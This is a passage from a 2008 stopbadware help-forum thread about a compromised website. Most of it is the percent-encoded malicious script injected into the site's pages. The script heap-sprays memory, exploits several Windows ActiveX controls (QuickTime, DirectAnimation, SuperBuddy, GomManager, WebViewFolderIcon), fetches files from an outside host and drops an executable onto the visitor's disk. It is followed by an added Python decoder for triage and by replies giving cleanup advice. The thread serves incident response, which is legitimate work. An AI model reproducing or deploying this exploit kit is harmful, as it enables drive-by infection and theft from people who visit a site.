9%09%6d%65%6d%5f%66%6c%61%67%20%3d%20%31%3b%0d%0a%09%09%68%61%76%69%6e%67%28%29%3b%0d%0a%09%7d%0d%0a%0d%0a%09%72%65%74%75%72%6e%20%30%3b%0d%0a%7d%0d%0a%76%61%72%20%70%61%64%64%69%6e%67%20%3d%20%22%41%41%41%41%22%3b%0d%0a%76%61%72%20%68%65%61%70%42%61%73%65%20%3d%20%30%78%30%30%31%35%30%30%30%30%3b%0d%0a%76%61%72%20%6d%65%6d%6f%3b%0d%0a%0d%0a%66%75%6e%63%74%69%6f%6e%20%69%6e%69%74%28%6d%61%78%41%6c%6c%6f%63%29%0d%0a%7b%0d%0a%09%77%68%69%6c%65%20%28%34%20%2b%20%70%61%64%64%69%6e%67%2e%6c%65%6e%67%74%68%2a%32%20%2b%20%32%20%3c%20%36%35%35%33%35%29%0d%0a%09%09%70%61%64%64%69%6e%67%20%2b%3d%20%70%61%64%64%69%6e%67%3b%0d%0a%0d%0a%09%6d%65%6d%6f%20%3d%20%6e%65%77%20%41%72%72%61%79%28%29%3b%0d%0a%09%66%6c%75%73%68%28%29%3b%0d%0a%7d%0d%0a%0d%0a%0d%0a%66%75%6e%63%74%69%6f%6e%20%66%6c%75%73%68%28%29%0d%0a%7b%0d
%0a%09%64%65%6c%65%74%65%20%6d%65%6d%6f%5b%22%70%6c%75%6e%67%65%72%22%5d%3b%0d%0a%09%43%6f%6c%6c%65%63%74%47%61%72%62%61%67%65%28%29%3b%0d%0a%0d%0a%09%6d%65%6d%6f%5b%22%70%6c%75%6e%67%65%72%22%5d%20%3d%20%6e%65%77%20%41%72%72%61%79%28%29%3b%0d%0a%09%76%61%72%20%62%79%74%65%73%20%3d%20%6e%65%77%20%41%72%72%61%79%28%33%32%2c%20%36%34%2c%20%32%35%36%2c%20%33%32%37%36%38%29%3b%0d%0a%0d%0a%09%66%6f%72%20%28%76%61%72%20%69%20%3d%20%30%3b%20%69%20%3c%20%36%3b%20%69%2b%2b%29%20%7b%0d%0a%09%09%66%6f%72%28%76%61%72%20%6e%20%3d%20%30%3b%20%6e%20%3c%20%34%3b%20%6e%2b%2b%29%20%7b%0d%0a%09%09%09%76%61%72%20%6c%65%6e%20%3d%20%6d%65%6d%6f%5b%22%70%6c%75%6e%67%65%72%22%5d%2e%6c%65%6e%67%74%68%3b%0d%0a%09%09%09%65%76%61%6c%28%27%6d%65%6d%6f%5b%22%70%6c%75%6e%67%65%72%22%5d%5b%6c%65%6e%5d%20%3d%20%70%61%64%64%69%6e%67%2e%73%75%62%73%74%72%28%30%2c%20%28%27%20%2b%20%62%79%74%65%73%5b%6e%5d%20%2b%20%27%2d%36%29%2f%32%29%3b%27%29%3b%0d%0a%09%09%7d%0d%0a%09%7d%0d%0a%7d%0d%0a%0d%0a%66%75%6e%63%74%69%6f%6e%20%61%6c%6c%6f%63%28%61%72%67%2c%20%74%61%67%29%0d%0a%7b%0d%0a%09%76%61%72%20%73%69%7a%65%3b%0d%0a%0d%0a%09%73%69%7a%65%20%3d%20%61%72%67%3b%0d%0a%0d%0a%09%69%66%20%28%73%69%7a%65%20%3d%3d%20%33%32%20%7c%7c%20%73%69%7a%65%20%3d%3d%20%36%34%20%7c%7c%20%73%69%7a%65%20%3d%3d%20%32%35%36%20%7c%7c%20%73%69%7a%65%20%3d%3d%20%33%32%37%36%38%29%20%7b%7d%0d%0a%0d%0a%09%69%66%20%28%20%21%20%6d%65%6d%6f%5b%74%61%67%5d%20%29%0d%0a%09%09%6d%65%6d%6f%5b%74%61%67%5d%20%3d%20%6e%65%77%20%41%72%72%61%79%28%29%3b%0d%0a%0d%0a%09%76%61%72%20%6c%65%6e%20%3d%20%6d%65%6d%6f%5b%74%61%67%5d%2e%6c%65%6e%67%74%68%3b%0d%0a%0d%0a%09%6d%65%6d%6f%5b%74%61%67%5d%5b%6c%65%6e%5d%20%3d%20%70%61%64%64%69%6e%67%2e%73%75%62%73%74%72%28%30%2c%20%28%61%72%67%2d%36%29%2f%32%29%3b%0d%0a%7d%0d%0a%0d%0a%0d%0a%66%75%6e%63%74%69%6f%6e%20%61%6c%6c%6f%63%5f%73%74%72%28%61%72%67%2c%20%74%61%67%29%0d%0a%7b%0d%0a%09%76%61%72%20%73%69%7a%65%3b%0d%0a%0d%0a%09%73%69%7a%65%20%3d%20%34%20%2b%20%61%72%67%2e%6c%65%6e%67%74%68%2a%32%20%2b%20%32%3
b%0d%0a%0d%0a%09%69%66%20%28%73%69%7a%65%20%3d%3d%20%33%32%20%7c%7c%20%73%69%7a%65%20%3d%3d%20%36%34%20%7c%7c%20%73%69%7a%65%20%3d%3d%20%32%35%36%20%7c%7c%20%73%69%7a%65%20%3d%3d%20%33%32%37%36%38%29%20%7b%7d%0d%0a%0d%0a%09%69%66%20%28%20%21%20%6d%65%6d%6f%5b%74%61%67%5d%29%0d%0a%09%09%6d%65%6d%6f%5b%74%61%67%5d%20%3d%20%6e%65%77%20%41%72%72%61%79%28%29%3b%0d%0a%0d%0a%09%76%61%72%20%6c%65%6e%20%3d%20%6d%65%6d%6f%5b%74%61%67%5d%2e%6c%65%6e%67%74%68%3b%0d%0a%09%6d%65%6d%6f%5b%74%61%67%5d%5b%6c%65%6e%5d%20%3d%20%61%72%67%2e%73%75%62%73%74%72%28%30%2c%20%61%72%67%2e%6c%65%6e%67%74%68%29%3b%0d%0a%7d%0d%0a%0d%0a%66%75%6e%63%74%69%6f%6e%20%66%72%65%65%28%74%61%67%29%20%7b%20%0d%0a%09%64%65%6c%65%74%65%20%6d%65%6d%6f%5b%74%61%67%5d%3b%0d%0a%09%43%6f%6c%6c%65%63%74%47%61%72%62%61%67%65%28%29%3b%0d%0a%09%66%6c%75%73%68%28%29%3b%0d%0a%7d%0d%0a%0d%0a%66%75%6e%63%74%69%6f%6e%20%68%65%78%28%6e%75%6d%2c%20%77%69%64%74%68%29%0d%0a%7b%0d%0a%09%76%61%72%20%64%69%67%69%74%73%20%3d%20%22%30%31%32%33%34%35%36%37%38%39%41%42%43%44%45%46%22%3b%0d%0a%0d%0a%09%76%61%72%20%68%65%78%20%3d%20%64%69%67%69%74%73%2e%73%75%62%73%74%72%28%6e%75%6d%20%26%20%30%78%46%2c%20%31%29%3b%0d%0a%0d%0a%09%77%68%69%6c%65%20%28%6e%75%6d%20%3e%20%30%78%46%29%20%7b%0d%0a%09%09%6e%75%6d%20%3d%20%6e%75%6d%20%3e%3e%3e%20%34%3b%0d%0a%09%09%68%65%78%20%3d%20%64%69%67%69%74%73%2e%73%75%62%73%74%72%28%6e%75%6d%20%26%20%30%78%46%2c%20%31%29%20%2b%20%68%65%78%3b%0d%0a%09%7d%0d%0a%0d%0a%09%76%61%72%20%77%69%64%74%68%20%3d%20%28%77%69%64%74%68%20%3f%20%77%69%64%74%68%20%3a%20%30%29%3b%0d%0a%0d%0a%09%77%68%69%6c%65%20%28%68%65%78%2e%6c%65%6e%67%74%68%20%3c%20%77%69%64%74%68%29%0d%0a%09%09%68%65%78%20%3d%20%22%30%22%20%2b%20%68%65%78%3b%0d%0a%0d%0a%09%72%65%74%75%72%6e%20%68%65%78%3b%0d%0a%7d%0d%0a%0d%0a%66%75%6e%63%74%69%6f%6e%20%61%64%64%72%20%28%61%64%64%72%29%20%7b%0d%0a%09%72%65%74%75%72%6e%20%75%6e%65%73%63%61%70%65%28%22%25%75%22%20%2b%20%68%65%78%28%61%64%64%72%20%26%20%30%78%46%46%46%46%2c%20%34%29%20%2b%20%22%25%75%
22%20%2b%20%68%65%78%28%28%61%64%64%72%20%3e%3e%20%31%36%29%20%26%20%30%78%46%46%46%46%2c%20%34%29%29%3b%0d%0a%7d%0d%0a%0d%0a%66%75%6e%63%74%69%6f%6e%20%73%74%61%72%74%56%4d%4c%32%28%29%20%7b%0d%0a%0d%0a%09%74%72%79%20%7b%09%0d%0a%09%09%76%61%72%20%74%61%72%67%65%74%20%3d%20%6e%65%77%20%41%63%74%69%76%65%58%4f%62%6a%65%63%74%28%22%44%69%72%65%63%74%41%6e%69%6d%61%74%69%6f%6e%2e%50%61%74%68%43%6f%6e%74%72%6f%6c%22%29%3b%0d%0a%09%09%69%6e%69%74%28%29%3b%0d%0a%09%09%76%61%72%20%6a%6d%70%65%63%78%20%3d%20%30%78%30%63%30%63%30%63%30%63%3b%0d%0a%09%0d%0a%09%09%76%61%72%20%76%74%61%62%6c%65%20%3d%20%75%6e%65%73%63%61%70%65%28%22%25%75%39%30%39%30%25%75%37%63%65%62%22%29%3b%0d%0a%0d%0a%09%09%66%6f%72%20%28%76%61%72%20%69%20%3d%20%30%3b%20%69%20%3c%20%31%32%34%2f%34%3b%20%69%2b%2b%29%0d%0a%09%09%09%76%74%61%62%6c%65%20%2b%3d%20%61%64%64%72%28%6a%6d%70%65%63%78%29%3b%0d%0a%0d%0a%09%09%76%74%61%62%6c%65%20%2b%3d%20%70%61%64%64%69%6e%67%2e%73%75%62%73%74%72%28%30%2c%20%28%31%30%30%38%2d%31%33%38%29%2f%32%29%3b%0d%0a%0d%0a%09%09%76%61%72%20%66%61%6b%65%4f%62%6a%50%74%72%20%3d%20%68%65%61%70%42%61%73%65%20%2b%20%30%78%36%38%38%20%2b%20%28%28%31%30%30%38%2b%38%29%2f%38%29%2a%34%38%3b%0d%0a%09%09%76%61%72%20%66%61%6b%65%4f%62%6a%43%68%75%6e%6b%20%3d%20%70%61%64%64%69%6e%67%2e%73%75%62%73%74%72%28%30%2c%20%28%30%78%32%30%30%63%2d%34%29%2f%32%29%20%2b%20%61%64%64%72%28%66%61%6b%65%4f%62%6a%50%74%72%29%20%2b%20%70%61%64%64%69%6e%67%2e%73%75%62%73%74%72%28%30%2c%20%31%34%2f%32%29%3b%0d%0a%0d%0a%09%09%43%6f%6c%6c%65%63%74%47%61%72%62%61%67%65%28%29%3b%0d%0a%09%09%66%6c%75%73%68%28%29%3b%0d%0a%0d%0a%09%09%66%6f%72%20%28%76%61%72%20%69%20%3d%20%30%3b%20%69%20%3c%20%31%30%30%3b%20%69%2b%2b%29%0d%0a%09%09%09%61%6c%6c%6f%63%5f%73%74%72%28%76%74%61%62%6c%65%29%3b%0d%0a%0d%0a%09%09%61%6c%6c%6f%63%5f%73%74%72%28%76%74%61%62%6c%65%2c%20%22%6c%6f%6f%6b%61%73%69%64%65%22%29%3b%0d%0a%09%09%66%72%65%65%28%22%6c%6f%6f%6b%61%73%69%64%65%22%29%3b%0d%0a%0d%0a%09%09%66%6f%72%20%28%76%61%72%20%69%20%3d%20
%30%3b%20%69%20%3c%20%31%30%30%3b%20%69%2b%2b%29%0d%0a%09%09%09%61%6c%6c%6f%63%28%30%78%32%30%31%30%29%3b%0d%0a%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0d%0a%09%09%66%6f%72%20%28%76%61%72%20%69%20%3d%20%30%3b%20%69%20%3c%20%32%3b%20%69%2b%2b%29%20%7b%0d%0a%20%20%20%20%20%20%20%20%09%09%61%6c%6c%6f%63%5f%73%74%72%28%66%61%6b%65%4f%62%6a%43%68%75%6e%6b%29%3b%0d%0a%09%20%20%20%20%20%20%20%20%09%61%6c%6c%6f%63%5f%73%74%72%28%66%61%6b%65%4f%62%6a%43%68%75%6e%6b%2c%20%22%66%72%65%65%4c%69%73%74%22%29%3b%0d%0a%09%09%7d%0d%0a%0d%0a%09%09%61%6c%6c%6f%63%5f%73%74%72%28%66%61%6b%65%4f%62%6a%43%68%75%6e%6b%29%3b%0d%0a%09%09%66%72%65%65%28%22%66%72%65%65%4c%69%73%74%22%29%3b%0d%0a%09%09%73%65%74%53%70%49%64%28%37%29%3b%0d%0a%0d%0a%09%09%74%61%72%67%65%74%2e%4b%65%79%46%72%61%6d%65%28%30%78%34%30%30%30%30%38%30%31%2c%20%6e%65%77%20%41%72%72%61%79%28%31%29%2c%20%6e%65%77%20%41%72%72%61%79%28%31%29%29%3b%0d%0a%0d%0a%09%7d%20%63%61%74%63%68%28%65%29%20%7b%20%7d%0d%0a%0d%0a%09%72%65%74%75%72%6e%20%30%3b%0d%0a%7d%0d%0a%0d%0a%66%75%6e%63%74%69%6f%6e%20%73%74%61%72%74%51%75%69%63%6b%54%69%6d%65%28%29%0d%0a%7b%0d%0a%09%76%61%72%20%71%74%66%6c%67%20%3d%20%30%3b%0d%0a%09%76%61%72%20%71%74%73%72%63%20%3d%20%27%27%3b%0d%0a%0d%0a%09%66%6f%72%28%76%61%72%20%69%3d%34%3b%69%3c%3d%38%3b%69%2b%2b%29%20%7b%0d%0a%09%09%74%72%79%20%7b%0d%0a%09%09%09%76%61%72%20%71%74%20%3d%20%6e%65%77%20%41%63%74%69%76%65%58%4f%62%6a%65%63%74%28%27%51%75%69%63%6b%54%69%6d%65%2e%51%75%69%63%6b%54%69%6d%65%2e%27%20%2b%20%69%29%3b%0d%0a%09%09%09%69%66%20%28%71%74%29%20%7b%0d%0a%09%09%09%09%69%66%20%28%69%3d%3d%34%29%0d%0a%09%09%09%09%7b%0d%0a%09%09%09%09%09%71%74%66%6c%67%20%3d%20%27%37%27%3b%0d%0a%09%09%09%09%09%71%74%73%72%63%20%3d%20%27%3c%70%61%72%61%6d%20%6e%61%6d%65%3d%22%73%72%63%22%20%76%61%6c%75%65%3d%22%68%74%74%70%3a%2f%2f%63%6f%6c%6f%31%32%2e%6e%65%6f%74%72%69%64%65%78%2e%63%6f%6d%2f%57%53%54%70%39%4c%78%58%2f%58%41%58%79%63%6d%57%43%42%37%51%31%31%51%42%32%2e%71%74%6c%22%3e%27%3b%0d%0a%09%09%09%09%7
d%0d%0a%09%09%09%09%65%6c%73%65%0d%0a%09%09%09%09%7b%0d%0a%09%09%09%09%09%71%74%66%6c%67%20%3d%20%27%38%27%3b%0d%0a%09%09%09%09%09%71%74%73%72%63%20%3d%20%27%3c%70%61%72%61%6d%20%6e%61%6d%65%3d%22%73%72%63%22%20%76%61%6c%75%65%3d%22%68%74%74%70%3a%2f%2f%63%6f%6c%6f%31%32%2e%6e%65%6f%74%72%69%64%65%78%2e%63%6f%6d%2f%63%70%75%43%48%71%76%48%2f%4e%79%6d%41%51%32%54%7a%7a%41%36%74%4c%4e%4a%63%2e%6d%6f%76%22%3e%27%3b%0d%0a%09%09%09%09%7d%0d%0a%09%09%09%09%62%72%65%61%6b%3b%0d%0a%09%09%09%7d%0d%0a%09%09%7d%20%63%61%74%63%68%28%65%29%20%7b%7d%09%09%09%0d%0a%09%7d%0d%0a%0d%0a%09%69%66%20%28%71%74%66%6c%67%29%20%7b%0d%0a%09%09%76%61%72%20%71%74%68%74%6d%6c%20%3d%09%27%3c%6f%62%6a%65%63%74%20%43%4c%41%53%53%49%44%3d%22%63%6c%73%69%64%3a%30%32%42%46%32%35%44%35%2d%38%43%31%37%2d%34%42%32%33%2d%42%43%38%30%2d%44%33%34%38%38%41%42%44%44%43%36%42%22%20%77%69%64%74%68%3d%22%30%22%20%68%65%69%67%68%74%3d%22%30%22%20%73%74%79%6c%65%3d%22%62%6f%72%64%65%72%3a%30%70%78%22%20%6f%6e%6c%6f%61%64%3d%22%61%6c%65%72%74%28%2f%6f%6b%73%73%7a%2f%29%3b%22%3e%27%2b%0d%0a%09%09%09%09%71%74%73%72%63%20%2b%20%0d%0a%09%09%09%09%27%3c%70%61%72%61%6d%20%6e%61%6d%65%3d%22%61%75%74%6f%70%6c%61%79%22%20%76%61%6c%75%65%3d%22%74%72%75%65%22%3e%27%2b%0d%0a%09%09%09%09%27%3c%70%61%72%61%6d%20%6e%61%6d%65%3d%22%6c%6f%6f%70%22%20%76%61%6c%75%65%3d%22%66%61%6c%73%65%22%3e%27%2b%0d%0a%09%09%09%09%27%3c%70%61%72%61%6d%20%6e%61%6d%65%3d%22%63%6f%6e%74%72%6f%6c%6c%65%72%22%20%76%61%6c%75%65%3d%22%74%72%75%65%22%3e%27%2b%0d%0a%09%09%09%09%27%3c%2f%6f%62%6a%65%63%74%3e%27%3b%0d%0a%09%09%09%73%65%74%53%70%49%64%28%69%20%3d%3d%20%34%20%3f%20%36%20%3a%20%31%36%29%3b%0d%0a%09%09%09%76%61%72%20%6d%79%5f%64%69%76%20%3d%20%64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74%28%22%64%69%76%22%29%3b%0d%0a%09%09%09%6d%79%5f%64%69%76%2e%69%6e%6e%65%72%48%54%4d%4c%20%3d%20%71%74%68%74%6d%6c%3b%0d%0a%09%09%09%64%6f%63%75%6d%65%6e%74%2e%62%6f%64%79%2e%61%70%70%65%6e%64%43%68%69%6c%64%28%6d%79%5f%64%69%76%29%3b%0d%0a%
09%7d%0d%0a%0d%0a%09%72%65%74%75%72%6e%20%30%3b%0d%0a%7d%0d%0a%66%75%6e%63%74%69%6f%6e%20%73%74%61%72%74%53%75%70%65%72%42%75%64%64%79%28%29%20%7b%0d%0a%0d%0a%09%74%72%79%20%7b%0d%0a%09%09%76%61%72%20%62%75%64%64%79%20%3d%20%6e%65%77%20%41%63%74%69%76%65%58%4f%62%6a%65%63%74%28%27%53%62%2e%53%75%70%65%72%42%75%64%64%79%2e%31%27%29%3b%0d%0a%0d%0a%09%09%69%66%20%28%62%75%64%64%79%29%20%7b%0d%0a%09%09%09%73%65%74%53%70%49%64%28%39%29%3b%0d%0a%09%09%09%62%75%64%64%79%2e%4c%69%6e%6b%53%42%49%63%6f%6e%73%28%30%78%30%63%30%63%30%63%30%63%29%3b%0d%0a%09%09%7d%0d%0a%09%7d%20%63%61%74%63%68%28%65%29%20%7b%7d%0d%0a%0d%0a%09%72%65%74%75%72%6e%20%30%3b%0d%0a%7d%0d%0a%0d%0a%66%75%6e%63%74%69%6f%6e%20%73%74%61%72%74%41%75%64%69%6f%46%69%6c%65%28%29%0d%0a%7b%0d%0a%09%74%72%79%20%7b%0d%0a%09%09%76%61%72%20%6d%6d%65%64%20%3d%20%64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74%28%22%6f%62%6a%65%63%74%22%29%3b%0d%0a%09%09%6d%6d%65%64%2e%73%65%74%41%74%74%72%69%62%75%74%65%28%22%63%6c%61%73%73%69%64%22%2c%20%22%63%6c%73%69%64%3a%37%37%38%32%39%46%31%34%2d%44%39%31%31%2d%34%30%46%46%2d%41%32%46%30%2d%44%31%31%44%42%38%44%36%44%30%42%43%22%29%3b%0d%0a%0d%0a%09%09%76%61%72%20%6d%6d%73%3d%27%27%3b%0d%0a%09%09%66%6f%72%28%76%61%72%20%69%3d%30%3b%69%3c%34%31%32%30%3b%69%2b%2b%29%20%7b%20%6d%6d%73%20%2b%3d%20%22%41%22%3b%20%7d%0d%0a%09%0d%0a%09%09%73%65%74%53%70%49%64%28%33%29%3b%0d%0a%09%09%6d%6d%73%2b%3d%22%5c%78%30%63%5c%78%30%63%5c%78%30%63%5c%78%30%63%22%3b%0d%0a%09%09%6d%6d%65%64%2e%53%65%74%46%6f%72%6d%61%74%4c%69%6b%65%53%61%6d%70%6c%65%28%6d%6d%73%29%3b%0d%0a%09%7d%20%63%61%74%63%68%28%65%29%20%7b%20%7d%0d%0a%7d%0d%0a%0d%0a%66%75%6e%63%74%69%6f%6e%20%73%74%61%72%74%47%4f%4d%28%29%0d%0a%7b%0d%0a%09%76%61%72%20%73%55%52%4c%3d%27%27%3b%0d%0a%09%66%6f%72%28%76%61%72%20%69%3d%30%3b%69%3c%35%31%30%3b%69%2b%2b%29%20%7b%0d%0a%09%09%73%55%52%4c%20%2b%3d%20%75%6e%65%73%63%61%70%65%28%22%25%30%63%22%29%3b%0d%0a%09%7d%0d%0a%0d%0a%09%73%65%74%53%70%49%64%28%31%33%29%3b%0d%0a%0d%0a
%09%76%61%72%20%47%6f%6d%4d%61%6e%61%67%65%72%20%3d%20%6e%65%77%20%41%63%74%69%76%65%58%4f%62%6a%65%63%74%28%27%47%6f%6d%57%65%62%43%74%72%6c%2e%47%6f%6d%4d%61%6e%61%67%65%72%2e%31%27%29%3b%0d%0a%09%47%6f%6d%4d%61%6e%61%67%65%72%2e%4f%70%65%6e%55%52%4c%28%73%55%52%4c%29%3b%0d%0a%7d%0d%0a%0d%0a%66%75%6e%63%74%69%6f%6e%20%73%74%61%72%74%57%56%46%28%29%0d%0a%7b%0d%0a%09%73%65%74%53%70%49%64%28%31%32%29%3b%0d%0a%09%66%6f%72%20%28%76%61%72%20%69%3d%30%3b%69%3c%31%32%38%3b%69%2b%2b%29%0d%0a%09%7b%0d%0a%09%09%74%72%79%7b%20%0d%0a%09%09%09%76%61%72%20%74%61%72%20%3d%20%6e%65%77%20%41%63%74%69%76%65%58%4f%62%6a%65%63%74%28%27%57%65%62%56%69%65%77%46%6f%6c%64%65%72%49%63%6f%6e%2e%57%65%62%56%69%65%77%46%6f%6c%64%65%72%49%63%6f%6e%2e%31%27%29%3b%0d%0a%09%09%09%74%61%72%2e%73%65%74%53%6c%69%63%65%28%30%78%37%66%66%66%66%66%66%65%2c%20%30%78%30%63%30%63%30%63%30%63%2c%20%30%78%30%63%30%63%30%63%30%63%2c%30%78%30%63%30%63%30%63%30%63%29%3b%0d%0a%09%09%7d%20%63%61%74%63%68%28%65%29%7b%7d%0d%0a%09%7d%0d%0a%0d%0a%09%73%65%74%53%70%49%64%28%31%36%29%3b%0d%0a%09%72%65%74%75%72%6e%20%30%3b%0d%0a%7d%0d%0a%0d%0a%69%66%20%28%73%74%61%72%74%4d%44%41%43%28%29%20%7c%7c%20%6d%61%6b%65%53%6c%69%64%65%28%29%20%7c%7c%20%73%74%61%72%74%56%4d%4c%32%28%29%20%7c%7c%20%73%74%61%72%74%51%75%69%63%6b%54%69%6d%65%28%29%20%7c%7c%20%73%74%61%72%74%53%75%70%65%72%42%75%64%64%79%28%29%20%7c%7c%20%73%74%61%72%74%41%75%64%69%6f%46%69%6c%65%28%29%20%7c%7c%20%73%74%61%72%74%47%4f%4d%28%29%20%7c%7c%20%73%74%61%72%74%57%56%46%28%29%29%20%7b%7d%0d%0a%0d%0a%3c%2f%73%63%72%69%70%74%3e%0d%0a%0d%0a%3c%6f%62%6a%65%63%74%20%63%6c%61%73%73%69%64%3d%27%63%6c%73%69%64%3a%32%34%46%33%45%41%44%36%2d%38%42%38%37%2d%34%43%31%41%2d%39%37%44%41%2d%37%31%43%31%32%36%42%44%41%30%38%46%27%20%69%64%3d%27%79%61%68%38%27%3e%3c%2f%6f%62%6a%65%63%74%3e%3c%73%63%72%69%70%74%20%6c%61%6e%67%75%61%67%65%3d%22%6a%61%76%61%73%63%72%69%70%74%22%3e%20%74%72%79%20%7b%20%79%61%68%38%2e%47%65%74%46%69%6c%65%28%20%20')
+
MU2 +
unescape
('%2c%22%63%3a%5c%5c%6d%6f%73%76%73%38%2e%65%78%65%22%2c%35%2c%31%2c%22%6d%6f%73%76%73%38%22%29%3b%20%7d%20%63%61%74%63%68%28%65%29%7b%20%7d%3c%2f%73%63%72%69%70%74%3e%0a%0a%3c%2f%62%6f%64%79%3e%0a%3c%2f%68%74%6d%6c%3e%0a%0a');

document.write (SB);

</script>


Something injecting code via PHP it appears. So I'd guess that one of
the PHP modules is infected, or they are doing something clever with
some sort of mod_rewrite (but I'd go for the PHP)...

But I'd definitely tell your web host about it, or if your own server,
re-image it.
I'd also take the site down until you can fix it rather than risk
infecting those that do visit...

And unless you chose the exact same time to fix it as I scanned the
site, it blocked my IP eventually... and didn't serve the malware
content to me....
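To read a blob like the one above without ever running it, here is an added Python example (not code from anyone in this thread) that statically rebuilds the `unescape('...') + MU2 + unescape('...')` concatenation and pulls out the indicators a responder wants first: ActiveX ProgIDs, CLSIDs, the drop path, and the 0x0c0c0c0c heap-spray marker. The sample input is excerpted from the escaped script posted above (the startSuperBuddy() function, the <object>/GetFile tail and the final literal); the `MU2` operand is not a literal on the page, so it is kept as a placeholder rather than guessed.

```python
import re

# Percent-encoded excerpts copied from the escaped script posted above.
PIECE_A = (
    "%66%75%6e%63%74%69%6f%6e%20%73%74%61%72%74%53%75%70%65%72%42%75%64%64%79%28%29%20%7b%0d%0a"
    "%0d%0a%09%74%72%79%20%7b%0d%0a"
    "%09%09%76%61%72%20%62%75%64%64%79%20%3d%20%6e%65%77%20%41%63%74%69%76%65%58%4f%62%6a%65%63%74"
    "%28%27%53%62%2e%53%75%70%65%72%42%75%64%64%79%2e%31%27%29%3b%0d%0a"
    "%0d%0a%09%09%69%66%20%28%62%75%64%64%79%29%20%7b%0d%0a"
    "%09%09%09%73%65%74%53%70%49%64%28%39%29%3b%0d%0a"
    "%09%09%09%62%75%64%64%79%2e%4c%69%6e%6b%53%42%49%63%6f%6e%73%28%30%78%30%63%30%63%30%63%30%63%29%3b%0d%0a"
    "%09%09%7d%0d%0a%09%7d%20%63%61%74%63%68%28%65%29%20%7b%7d%0d%0a%0d%0a%09%72%65%74%75%72%6e%20%30%3b%0d%0a%7d%0d%0a"
)
PIECE_B = (
    "%3c%6f%62%6a%65%63%74%20%63%6c%61%73%73%69%64%3d%27%63%6c%73%69%64%3a"
    "%32%34%46%33%45%41%44%36%2d%38%42%38%37%2d%34%43%31%41%2d%39%37%44%41%2d%37%31%43%31%32%36%42%44%41%30%38%46"
    "%27%20%69%64%3d%27%79%61%68%38%27%3e%3c%2f%6f%62%6a%65%63%74%3e"
    "%3c%73%63%72%69%70%74%20%6c%61%6e%67%75%61%67%65%3d%22%6a%61%76%61%73%63%72%69%70%74%22%3e"
    "%20%74%72%79%20%7b%20%79%61%68%38%2e%47%65%74%46%69%6c%65%28%20%20"
)
PIECE_C = (
    "%2c%22%63%3a%5c%5c%6d%6f%73%76%73%38%2e%65%78%65%22%2c%35%2c%31%2c%22%6d%6f%73%76%73%38%22%29%3b"
    "%20%7d%20%63%61%74%63%68%28%65%29%7b%20%7d%3c%2f%73%63%72%69%70%74%3e%0a%0a"
    "%3c%2f%62%6f%64%79%3e%0a%3c%2f%68%74%6d%6c%3e%0a%0a"
)

# Same shape as the posted source: two unescape() literals joined by the
# variable MU2 (its value is not on the page), then written into the document.
SAMPLE_JS = (
    "SB = unescape('" + PIECE_A + PIECE_B + "')\n+\nMU2 +\nunescape\n('" + PIECE_C + "');\n"
    "document.write (SB);\n"
)

LITERAL_RE = re.compile(r"unescape\s*\(\s*'([^']*)'\s*\)")   # single-quoted, as in the post
PROGID_RE = re.compile(r"new\s+ActiveXObject\s*\(\s*['\"]([^'\"]+)['\"]\s*\)")
CLSID_RE = re.compile(r"clsid:([0-9A-F]{8}(?:-[0-9A-F]{4}){3}-[0-9A-F]{12})", re.I)
DROP_RE = re.compile(r'"([A-Za-z]:\\+[^"]+\.exe)"')
SPRAY_RE = re.compile(r"0x0c0c0c0c|(?:\\x0c){4}", re.I)


def js_unescape(s):
    """Decode like JavaScript's unescape(): %uXXXX -> one UTF-16 code unit,
    %XX -> one byte (Latin-1), anything else kept literally. urllib.parse.unquote
    is deliberately not used: it knows nothing of %uXXXX and UTF-8-decodes bytes
    >= 0x80, both of which mangle shellcode."""
    def repl(m):
        return chr(int(m.group(1) or m.group(2), 16))
    return re.sub(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})", repl, s)


def decode_unescape_concat(js_src):
    """Statically rebuild the string an `unescape('..') + X + unescape('..')`
    expression produces, without executing any JavaScript. A non-literal operand
    sitting between two literals becomes an <operand:NAME> placeholder."""
    pieces, pos = [], 0
    for m in LITERAL_RE.finditer(js_src):
        if pieces:
            ident = js_src[pos:m.start()].replace("+", "").strip()
            if ident:
                pieces.append("<operand:%s>" % ident)
        pieces.append(js_unescape(m.group(1)))
        pos = m.end()
    return "".join(pieces)


def extract_indicators(decoded):
    """Triage indicators from the decoded script: which ActiveX controls it
    instantiates (ProgIDs / CLSIDs), where it drops the binary, and how many
    0x0c0c0c0c heap-spray markers it carries."""
    return {
        "progids": sorted(set(PROGID_RE.findall(decoded))),
        "clsids": sorted(c.upper() for c in set(CLSID_RE.findall(decoded))),
        "drop_paths": sorted(set(DROP_RE.findall(decoded))),
        "spray_markers": len(SPRAY_RE.findall(decoded)),
    }


if __name__ == "__main__":
    decoded = decode_unescape_concat(SAMPLE_JS)
    print(decoded)
    for key, value in extract_indicators(decoded).items():
        print("%s: %s" % (key, value))
```

Run it against the two .js files rather than the page: save each with wget/curl (never open it in a browser), paste its source into SAMPLE_JS, and the ProgID/CLSID list tells you which client-side components the kit is targeting, while the drop path and the operand placeholder tell you what else (the download URL held in MU2) you still need to recover from the file.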


Murdoch

unread,
Jan 13, 2008, 10:37:37 PM1/13/08
to stopbadware
That's the script I found too. I do not think a reinstall will help.
This is clearly the result of a security hole. Odds are as soon as you
have done a reinstall you'll get infected again.

SteveW

unread,
Jan 14, 2008, 4:47:39 AM1/14/08
to stopbadware
On Jan 13, 3:03 pm, Flattery <rob...@hickorytech.net> wrote:
> That is odd.  It does not show up on my computer when I view source...
> but thank you it gives me some direction.

When you're investigating your own site, never use View Source in your
browser. Go straight to the source code file on the server.

Chris Wright

unread,
Jan 14, 2008, 5:01:04 AM1/14/08
to stopb...@googlegroups.com
Murdoch wrote:
> That's the script I found too. I do not think a reinstall will help.
> This is clearly the result of a security hole. Odds are as soon as you
> have done a reinstall you'll get infected again.
>
>

Not necessarily so, it could be that they gained root access via an RFI
vulnerability, but obviously you need to close the door first before
going live with the site again.
(Note I said not necessarily, it could have been a security hole in
apache/php/perl/mysql or whatever on the server itself, OR, it could be
a hole in an application installed on the server (forum, blog, etc), OR,
it could be compromised already at root level by password cracking...
The point being, too many methods of entry to be sure, but we all agree
you need to find the door as your second priority, and then close it
before even thinking of bringing the site back up... (First priority,
take the site down))

Chris

Murdoch

unread,
Jan 14, 2008, 7:24:46 AM1/14/08
to stopbadware
In the case of this infection, such a course of action is not
